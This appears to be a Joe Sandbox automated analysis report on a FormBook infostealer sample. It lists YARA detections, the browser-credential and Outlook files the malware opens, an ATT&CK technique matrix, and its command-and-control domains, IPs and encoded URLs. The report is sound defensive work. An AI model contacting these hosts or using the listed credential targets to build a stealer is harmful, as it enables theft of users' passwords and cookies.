Source: cuwattsjDnLrZm.exe, 00000005.00000002.2943518696.0000000000F80000.00000002.00000001.00040000.00000000.sdmp, cuwattsjDnLrZm.exe, 00000005.00000000.2172586485.0000000000F80000.00000002.00000001.00040000.00000000.sdmp, cuwattsjDnLrZm.exe, 00000007.00000002.2943763222.0000000001AD0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock
Source: cuwattsjDnLrZm.exe, 00000005.00000002.2943518696.0000000000F80000.00000002.00000001.00040000.00000000.sdmp, cuwattsjDnLrZm.exe, 00000005.00000000.2172586485.0000000000F80000.00000002.00000001.00040000.00000000.sdmp, cuwattsjDnLrZm.exe, 00000007.00000002.2943763222.0000000001AD0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: }Program Manager

Stealing of Sensitive Information

Yara detected FormBook

Source: Yara match	File source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000006.00000002.2943713333.0000000002FA0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2247593788.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2943777729.0000000002FF0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2944035557.00000000025E0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2248443775.0000000004200000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2945365410.00000000056F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2247956457.00000000039A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2942688422.0000000002A70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\SysWOW64\logman.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\logman.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\logman.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\logman.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\logman.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\logman.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\logman.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\logman.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\SysWOW64\logman.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

Jump to behavior

Remote Access Functionality

Yara detected FormBook

Source: Yara match	File source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000006.00000002.2943713333.0000000002FA0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2247593788.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2943777729.0000000002FF0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2944035557.00000000025E0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2248443775.0000000004200000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2945365410.00000000056F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2247956457.00000000039A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2942688422.0000000002A70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	Windows Management Instrumentation	1 DLL Side-Loading	412 Process Injection	2 Virtualization/Sandbox Evasion	1 OS Credential Dumping	121 Security Software Discovery	Remote Services	1 Email Collection	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	1 Abuse Elevation Control Mechanism	412 Process Injection	LSASS Memory	2 Virtualization/Sandbox Evasion	Remote Desktop Protocol	1 Archive Collected Data	3 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 DLL Side-Loading	1 Deobfuscate/Decode Files or Information	Security Account Manager	2 Process Discovery	SMB/Windows Admin Shares	1 Data from Local System	4 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 Abuse Elevation Control Mechanism	NTDS	1 Application Window Discovery	Distributed Component Object Model	Input Capture	4 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	3 Obfuscated Files or Information	LSA Secrets	2 File and Directory Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	12 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
YKzxWyqI6Y.exe	56%	Virustotal		Browse
YKzxWyqI6Y.exe	79%	ReversingLabs	Win32.Trojan.AutoitInject
YKzxWyqI6Y.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Label
https://static.loopia.se/responsive/images/iOS-114.png	0%	Avira URL Cloud	safe
https://www.loopia.com/support?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parking	0%	Avira URL Cloud	safe
https://static.loopia.se/responsive/images/iOS-72.png	0%	Avira URL Cloud	safe
http://www.rwse6wjx.sbs	0%	Avira URL Cloud	safe
https://www.loopia.com/loopiadns/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=park	0%	Avira URL Cloud	safe
http://whois.loopia.com/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&ut	0%	Avira URL Cloud	safe
https://static.loopia.se/responsive/styles/reset.css	0%	Avira URL Cloud	safe
http://www.myndighetssupport.org/2k8x/?f2yX=YHuxGZkXvzspJ&6v=5nrdHWUNGS1CeY1Dh+rNddjFA4ZoxwgtjTeQm53Oktjb1QtNMH0S/EnF9U1Zn/JeNK36dHzBWfQ8GG9tXE0SKiGA5TTa6RuRaUI/YxJ3aHSvnxfPbfXWpMw=	0%	Avira URL Cloud	safe
https://static.loopia.se/shared/logo/logo-loopia-white.svg	0%	Avira URL Cloud	safe
https://static.loopia.se/responsive/images/iOS-57.png	0%	Avira URL Cloud	safe
https://www.loopia.com/order/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingw	0%	Avira URL Cloud	safe
https://www.loopia.com/domainnames/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=pa	0%	Avira URL Cloud	safe
https://www.loopia.com/wordpress/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=park	0%	Avira URL Cloud	safe
https://www.loopia.com/sitebuilder/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=pa	0%	Avira URL Cloud	safe
https://www.loopia.com/hosting/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkin	0%	Avira URL Cloud	safe
https://www.loopia.com/login?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingwe	0%	Avira URL Cloud	safe
http://www.myndighetssupport.org/2k8x/	0%	Avira URL Cloud	safe
http://www.rwse6wjx.sbs/6xqt/	0%	Avira URL Cloud	safe
http://www.rwse6wjx.sbs/6xqt/?f2yX=YHuxGZkXvzspJ&6v=5+yBqFkMyRtNr+GeOMKnnCL8jbElscQwzEvWA86+RKe5k7i8BTcok4cHFvnpp+lCvMgcXFd4BCCry6S6UOloceQcAmQNddIHBDsKYw5bAFXTOryRDlwOHlE=	0%	Avira URL Cloud	safe
https://www.loopia.com/woocommerce/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=pa	0%	Avira URL Cloud	safe
https://static.loopia.se/shared/images/additional-pages-hero-shape.webp	0%	Avira URL Cloud	safe
https://static.loopia.se/shared/style/2022-extra-pages.css	0%	Avira URL Cloud	safe
https://www.loopia.se?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
www.myndighetssupport.org	194.9.94.86	true	true	unknown
b1-3-r111.kunlundns.top	101.32.205.61	true	true	unknown
ghs.googlehosted.com	172.217.18.115	true	false	high
www.dfr88.top	unknown	unknown	false	unknown
www.rwse6wjx.sbs	unknown	unknown	false	unknown
www.kevmedia.online	unknown	unknown	false	unknown
www.bacoonbase.online	unknown	unknown	false	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://www.myndighetssupport.org/2k8x/?f2yX=YHuxGZkXvzspJ&6v=5nrdHWUNGS1CeY1Dh+rNddjFA4ZoxwgtjTeQm53Oktjb1QtNMH0S/EnF9U1Zn/JeNK36dHzBWfQ8GG9tXE0SKiGA5TTa6RuRaUI/YxJ3aHSvnxfPbfXWpMw=	true	Avira URL Cloud: safe	unknown
http://www.rwse6wjx.sbs/6xqt/	true	Avira URL Cloud: safe	unknown
http://www.rwse6wjx.sbs/6xqt/?f2yX=YHuxGZkXvzspJ&6v=5+yBqFkMyRtNr+GeOMKnnCL8jbElscQwzEvWA86+RKe5k7i8BTcok4cHFvnpp+lCvMgcXFd4BCCry6S6UOloceQcAmQNddIHBDsKYw5bAFXTOryRDlwOHlE=	true	Avira URL Cloud: safe	unknown
http://www.myndighetssupport.org/2k8x/	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	logman.exe, 00000006.00000002.2946173667.0000000007DBE000.00000004.00000020.00020000.00000000.sdmp	false		high
https://duckduckgo.com/ac/?q=	logman.exe, 00000006.00000002.2946173667.0000000007DBE000.00000004.00000020.00020000.00000000.sdmp	false		high
https://static.loopia.se/responsive/images/iOS-114.png	logman.exe, 00000006.00000002.2946027272.0000000006300000.00000004.00000800.00020000.00000000.sdmp, logman.exe, 00000006.00000002.2944473496.0000000003F98000.00000004.10000000.00040000.00000000.sdmp, cuwattsjDnLrZm.exe, 00000007.00000002.2944086698.00000000039C8000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.loopia.com/loopiadns/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=park	logman.exe, 00000006.00000002.2946027272.0000000006300000.00000004.00000800.00020000.00000000.sdmp, logman.exe, 00000006.00000002.2944473496.0000000003F98000.00000004.10000000.00040000.00000000.sdmp, cuwattsjDnLrZm.exe, 00000007.00000002.2944086698.00000000039C8000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	logman.exe, 00000006.00000002.2946173667.0000000007DBE000.00000004.00000020.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	logman.exe, 00000006.00000002.2946173667.0000000007DBE000.00000004.00000020.00020000.00000000.sdmp	false		high
https://static.loopia.se/responsive/images/iOS-72.png	logman.exe, 00000006.00000002.2946027272.0000000006300000.00000004.00000800.00020000.00000000.sdmp, logman.exe, 00000006.00000002.2944473496.0000000003F98000.00000004.10000000.00040000.00000000.sdmp, cuwattsjDnLrZm.exe, 00000007.00000002.2944086698.00000000039C8000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://whois.loopia.com/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&ut	logman.exe, 00000006.00000002.2946027272.0000000006300000.00000004.00000800.00020000.00000000.sdmp, logman.exe, 00000006.00000002.2944473496.0000000003F98000.00000004.10000000.00040000.00000000.sdmp, cuwattsjDnLrZm.exe, 00000007.00000002.2944086698.00000000039C8000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.ecosia.org/newtab/	logman.exe, 00000006.00000002.2946173667.0000000007DBE000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.rwse6wjx.sbs	cuwattsjDnLrZm.exe, 00000007.00000002.2945365410.000000000577D000.00000040.80000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.loopia.com/support?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parking	logman.exe, 00000006.00000002.2946027272.0000000006300000.00000004.00000800.00020000.00000000.sdmp, logman.exe, 00000006.00000002.2944473496.0000000003F98000.00000004.10000000.00040000.00000000.sdmp, cuwattsjDnLrZm.exe, 00000007.00000002.2944086698.00000000039C8000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://static.loopia.se/responsive/styles/reset.css	logman.exe, 00000006.00000002.2946027272.0000000006300000.00000004.00000800.00020000.00000000.sdmp, logman.exe, 00000006.00000002.2944473496.0000000003F98000.00000004.10000000.00040000.00000000.sdmp, cuwattsjDnLrZm.exe, 00000007.00000002.2944086698.00000000039C8000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://ac.ecosia.org/autocomplete?q=	logman.exe, 00000006.00000002.2946173667.0000000007DBE000.00000004.00000020.00020000.00000000.sdmp	false		high
https://static.loopia.se/responsive/images/iOS-57.png	logman.exe, 00000006.00000002.2946027272.0000000006300000.00000004.00000800.00020000.00000000.sdmp, logman.exe, 00000006.00000002.2944473496.0000000003F98000.00000004.10000000.00040000.00000000.sdmp, cuwattsjDnLrZm.exe, 00000007.00000002.2944086698.00000000039C8000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://static.loopia.se/shared/logo/logo-loopia-white.svg	logman.exe, 00000006.00000002.2946027272.0000000006300000.00000004.00000800.00020000.00000000.sdmp, logman.exe, 00000006.00000002.2944473496.0000000003F98000.00000004.10000000.00040000.00000000.sdmp, cuwattsjDnLrZm.exe, 00000007.00000002.2944086698.00000000039C8000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.loopia.com/login?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingwe	logman.exe, 00000006.00000002.2946027272.0000000006300000.00000004.00000800.00020000.00000000.sdmp, logman.exe, 00000006.00000002.2944473496.0000000003F98000.00000004.10000000.00040000.00000000.sdmp, cuwattsjDnLrZm.exe, 00000007.00000002.2944086698.00000000039C8000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.loopia.com/order/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingw	logman.exe, 00000006.00000002.2946027272.0000000006300000.00000004.00000800.00020000.00000000.sdmp, logman.exe, 00000006.00000002.2944473496.0000000003F98000.00000004.10000000.00040000.00000000.sdmp, cuwattsjDnLrZm.exe, 00000007.00000002.2944086698.00000000039C8000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	logman.exe, 00000006.00000002.2946173667.0000000007DBE000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.loopia.com/wordpress/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=park	logman.exe, 00000006.00000002.2946027272.0000000006300000.00000004.00000800.00020000.00000000.sdmp, logman.exe, 00000006.00000002.2944473496.0000000003F98000.00000004.10000000.00040000.00000000.sdmp, cuwattsjDnLrZm.exe, 00000007.00000002.2944086698.00000000039C8000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.loopia.com/sitebuilder/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=pa	logman.exe, 00000006.00000002.2946027272.0000000006300000.00000004.00000800.00020000.00000000.sdmp, logman.exe, 00000006.00000002.2944473496.0000000003F98000.00000004.10000000.00040000.00000000.sdmp, cuwattsjDnLrZm.exe, 00000007.00000002.2944086698.00000000039C8000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.loopia.com/domainnames/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=pa	logman.exe, 00000006.00000002.2946027272.0000000006300000.00000004.00000800.00020000.00000000.sdmp, logman.exe, 00000006.00000002.2944473496.0000000003F98000.00000004.10000000.00040000.00000000.sdmp, cuwattsjDnLrZm.exe, 00000007.00000002.2944086698.00000000039C8000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.loopia.com/hosting/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkin	logman.exe, 00000006.00000002.2946027272.0000000006300000.00000004.00000800.00020000.00000000.sdmp, logman.exe, 00000006.00000002.2944473496.0000000003F98000.00000004.10000000.00040000.00000000.sdmp, cuwattsjDnLrZm.exe, 00000007.00000002.2944086698.00000000039C8000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	logman.exe, 00000006.00000002.2946173667.0000000007DBE000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.loopia.com/woocommerce/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=pa	logman.exe, 00000006.00000002.2946027272.0000000006300000.00000004.00000800.00020000.00000000.sdmp, logman.exe, 00000006.00000002.2944473496.0000000003F98000.00000004.10000000.00040000.00000000.sdmp, cuwattsjDnLrZm.exe, 00000007.00000002.2944086698.00000000039C8000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.loopia.se?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb	logman.exe, 00000006.00000002.2946027272.0000000006300000.00000004.00000800.00020000.00000000.sdmp, logman.exe, 00000006.00000002.2944473496.0000000003F98000.00000004.10000000.00040000.00000000.sdmp, cuwattsjDnLrZm.exe, 00000007.00000002.2944086698.00000000039C8000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://static.loopia.se/shared/images/additional-pages-hero-shape.webp	logman.exe, 00000006.00000002.2946027272.0000000006300000.00000004.00000800.00020000.00000000.sdmp, logman.exe, 00000006.00000002.2944473496.0000000003F98000.00000004.10000000.00040000.00000000.sdmp, cuwattsjDnLrZm.exe, 00000007.00000002.2944086698.00000000039C8000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://static.loopia.se/shared/style/2022-extra-pages.css	logman.exe, 00000006.00000002.2946027272.0000000006300000.00000004.00000800.00020000.00000000.sdmp, logman.exe, 00000006.00000002.2944473496.0000000003F98000.00000004.10000000.00040000.00000000.sdmp, cuwattsjDnLrZm.exe, 00000007.00000002.2944086698.00000000039C8000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
194.9.94.86	www.myndighetssupport.org	Sweden	39570	LOOPIASE	true
101.32.205.61	b1-3-r111.kunlundns.top	China	132203	TENCENT-NET-AP-CNTencentBuildingKejizhongyiAvenueCN	true
172.217.18.115	ghs.googlehosted.com	United States	15169	GOOGLEUS	false

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1588978
Start date and time:	2025-01-11 07:56:23 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 7m 50s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	8
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	2
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	YKzxWyqI6Y.exe renamed because original name is a hash value
Original Sample Name:	ef322e64f7aaf33b58b0be9ec89572848e7292f3e8266573e6e25d65867c3fa5.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@7/3@5/3
EGA Information:	Successful, ratio: 75%
HCA Information:	Successful, ratio: 93% Number of executed functions: 26 Number of non-executed functions: 324
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
Excluded IPs from analysis (whitelisted): 20.109.210.53, 13.107.246.45
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target cuwattsjDnLrZm.exe, PID 1068 because it is empty
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing disassembly code.

Simulations

Behavior and APIs

Time	Type	Description
01:58:48	API Interceptor	172192x Sleep call for process: logman.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
194.9.94.86	9MZZG92yMO.exe	Get hash	malicious	FormBook	Browse	www.milp.store/oqbp/
	new.exe	Get hash	malicious	FormBook	Browse	www.milp.store/2j93/
	PO 1202495088.exe	Get hash	malicious	FormBook	Browse	www.milp.store/2j93/
	Hire P.O.exe	Get hash	malicious	FormBook	Browse	www.deeplungatlas.org/57zf/
	Arrival Notice.bat.exe	Get hash	malicious	FormBook	Browse	www.torentreprenad.com/r45o/
	P1 HWT623ATG.bat.exe	Get hash	malicious	FormBook, GuLoader	Browse	www.torentreprenad.com/r45o/
	BASF Purchase Order.doc	Get hash	malicious	FormBook	Browse	www.xn--matfrmn-jxa4m.se/ufuh/
	TT-Slip.bat.exe	Get hash	malicious	FormBook	Browse	www.torentreprenad.com/r45o/
	Doc PI.doc	Get hash	malicious	FormBook	Browse	www.xn--matfrmn-jxa4m.se/ufuh/
	Beauty_Stem_Invoice.doc	Get hash	malicious	FormBook	Browse	www.xn--matfrmn-jxa4m.se/ufuh/
101.32.205.61	ofZiNLLKZU.exe	Get hash	malicious	FormBook	Browse	www.rwse6wjx.sbs/gtil/
101.32.205.61	SHIPPING DOCUMENTS_PDF.exe	Get hash	malicious	FormBook	Browse	www.rwse6wjx.sbs/n0se/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
b1-3-r111.kunlundns.top	ofZiNLLKZU.exe	Get hash	malicious	FormBook	Browse	101.32.205.61
	SHIPPING DOCUMENTS_PDF.exe	Get hash	malicious	FormBook	Browse	101.32.205.61
	ZAMOWIEN.BAT.exe	Get hash	malicious	FormBook, GuLoader	Browse	43.155.76.124
	SWIFT COPY 0028_pdf.exe	Get hash	malicious	FormBook	Browse	43.155.76.124
	PO-DC13112024_pdf.vbs	Get hash	malicious	Unknown	Browse	43.155.76.124
	3NvALxFlHV.exe	Get hash	malicious	FormBook	Browse	43.155.76.124
	COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Get hash	malicious	FormBook	Browse	43.155.76.124
	QUOTE2342534.exe	Get hash	malicious	FormBook	Browse	129.226.56.200
	COMMERCAIL INVOICE AND DHL AWB TRACKING DETAIL.exe	Get hash	malicious	FormBook	Browse	129.226.56.200
	Re property pdf.exe	Get hash	malicious	FormBook	Browse	129.226.56.200

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
LOOPIASE	9MZZG92yMO.exe	Get hash	malicious	FormBook	Browse	194.9.94.86
	PO-0005082025 pdf.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	194.9.94.85
	QUOTATION#050125.exe	Get hash	malicious	FormBook	Browse	194.9.94.85
	QUOTATION#070125-ELITE MARINE .exe	Get hash	malicious	FormBook	Browse	194.9.94.85
	QUOTATION#050125.exe	Get hash	malicious	FormBook	Browse	194.9.94.85
	PO-000172483 pdf.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	194.9.94.85
	new.exe	Get hash	malicious	FormBook	Browse	194.9.94.86
	PO 1202495088.exe	Get hash	malicious	FormBook	Browse	194.9.94.86
	Hire P.O.exe	Get hash	malicious	FormBook	Browse	194.9.94.86
	Order.exe	Get hash	malicious	FormBook	Browse	194.9.94.85
TENCENT-NET-AP-CNTencentBuildingKejizhongyiAvenueCN	02Eh1ah35H.exe	Get hash	malicious	FormBook, GuLoader	Browse	101.35.209.183
	suBpo1g13Q.exe	Get hash	malicious	FormBook	Browse	101.35.209.183
	https://atpscan.global.hornetsecurity.com/?d=W3rdHn1Og9hhUJnVJzqWF36wMmxswAZldvtx3E21ybg&f=v8m9AqGfgV2Ri7cjqmfsuyl2V2Mu_lVW0BRsqcFw4upagWAQ1C-MqANvN6gf4zNV&i=&k=xREg&m=b_ORYMkPffImCXbCPli-aiR7Ga6rGe55sar2xtigCL4MrowDPSzt7ABKETTGxzegakAfoZ57KD02aVix8V8TVmZ2VcxzjeybXYrPiS2SB73LCKYktj5jv2aw6VcPRslz&n=s4crRkyHC4bab6S3yrgn1E3n-VmdqgfSqNiaCJyPrf6hnyL_SE4PHEo5SUcwwsFGV6rnB35iQFM5FLsE91obvZ0HTAEiqHnB8ROLzY5JVgg&r=oMs_cp4DXIjeQhcPWsPLyR3_oxBVUN4Iok_tSVE4DNNtzqeot7ZzvdXkh4vatwpC&s=bd82eb507a358fd35f72f18b86e67f3bfc1ce64bbeab0c01d700897b1b678efb&u=https%3A%2F%2Fe.trustifi.com%2F%23%2Ffff2af%2F32054d%2F67960f%2Fee6fed%2F5d1d11%2F46c760%2Ff79190%2Fc5ec40%2Fe8666a%2Fef542d%2F85972d%2F627493%2F9a11d6%2F1f4096%2F1d247f%2F818e78%2Fc53383%2Fd59aa0%2Fedfa57%2F7914c7%2Fc38cf6%2Ff74f56%2Ff45915%2F39dbbd%2Ff48710%2F1ddf22%2F37d5f2%2F9de9f7%2F96109e%2F882355%2F854b66%2F9d606d%2F2d0447%2Fad3b01%2F637d1c%2F3c0f2b%2F606f48%2Fa6d904%2F8fefe3%2F00a4bb%2F6520c6%2F9b795c%2Fb7de1a%2Fb5dde6%2F3f5692%2F997c7d%2Fc00925%2F782cce%2F511459%2Fab5aa8%2F91722a%2Feec933%2F3f4f91%2F894088%2F43adfa%2Fb78195%2F0407d0%2F56f022%2Fddf20e%2F946567%2Faa271a%2F507b7a%2Faccd06%2F50d63c%2F485c4b%2F07ced8%2Fd0ec21%2F260ce6%2Fb5edbb%2F79a81e%2F1fd160%2Ff4da41%2F7073e0%2F8a5e9a%2Fdac829%2F521e52%2Fa1a847%2F13ea63%2Fabb5a3%2Fe1901e%2Fd876f6%2F7b0bf4%2Fbd19df%2F89bdcd%2F1874d8%2F0fb7f3%2F72f438%2Fa098c5%2F4e2214%2F4b6e54%2F0c4a8f	Get hash	malicious	HTMLPhisher	Browse	170.106.97.195
